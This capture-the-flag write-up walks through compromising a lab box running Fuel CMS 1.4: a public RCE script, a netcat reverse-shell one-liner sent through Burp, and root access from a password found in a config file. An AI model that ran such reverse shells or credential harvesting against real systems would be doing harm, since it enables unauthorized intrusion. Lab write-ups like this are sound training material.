A new start-up has a few issues with their web server.

This is another easy rated box. Let’s begin.


nmap says we’ve got 80 (HTTP); I originally cancelled this scan about 60% in since it was running slowly. Later I ran it again in case there was something I’d missed, but no. So it’s web all the way.


The front page of the website shows it is running a fresh install of Fuel CMS version 1.4 and even shows the default credentials are admin:admin.

Checking searchsploit, there is an RCE vulnerability in Fuel version 1.4.1, so that looks promising. There is no metasploit module, but a python (2) script.


The payload from the script is essentially:


Where the words COMMAND_HERE are replaced with the command you want to execute, such as pwd, whoami, ls etc.


The pentest monkey alternative netcat shell works fine, provided it is URL encoded (ctrl+u in Burp Suite).


rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f

when URL encoded and inserted into the payload becomes


We start our listener and send this with Burp Repeater; we’re in as www-data and can read the user flag.


I spent what felt like quite a bit of time looking for some vulnerability in the server, but ultimately I couldn’t find one. That means we needs credentials - essentially the password for root.

Spoiler alert: This can be found in:

www-data@ubuntu:/var/www/html/fuel/application/config$ cat database.php

Once you’ve got it, it’s su root and that’s it.